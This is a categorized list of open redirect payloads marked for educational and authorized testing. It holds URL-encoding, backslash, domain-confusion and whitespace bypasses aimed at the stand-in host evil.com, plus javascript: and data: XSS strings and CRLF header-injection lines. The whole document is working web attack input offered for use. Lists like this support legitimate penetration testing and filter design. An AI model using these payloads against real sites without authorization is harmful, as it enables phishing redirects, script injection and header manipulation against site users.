# Open Redirect Payloads
# For educational and authorized testing only

# ============================================================================
# BASIC REDIRECTS
# ============================================================================
https://evil.com
http://evil.com
//evil.com
///evil.com
////evil.com

# ============================================================================
# PROTOCOL-RELATIVE
# ============================================================================
//evil.com
//evil.com/
//evil.com/%2f..

# ============================================================================
# BACKSLASH TRICKS
# ============================================================================
/\evil.com
\/evil.com
\\evil.com

# ============================================================================
# URL ENCODING
# ============================================================================
https://evil.com%2F%2F
https://evil.com%00
%2f%2fevil.com
%2f%5cevil.com

# ============================================================================
# DOMAIN CONFUSION
# ============================================================================
https://evil.com?.example.com
https://example.com@evil.com
https://evil.com#.example.com
https://evil.com\.example.com
https://evil.com%40example.com

# ============================================================================
# WHITESPACE BYPASS
# ============================================================================
//evil.com
	//evil.com
 //evil.com

# ============================================================================
# DATA/JAVASCRIPT SCHEMES
# ============================================================================
javascript:alert(1)
data:text/html,<script>alert(1)</script>
javascript:alert(document.domain)

# ============================================================================
# CRLF INJECTION
# ============================================================================
%0d%0aLocation: https://evil.com
%0aLocation: https://evil.com
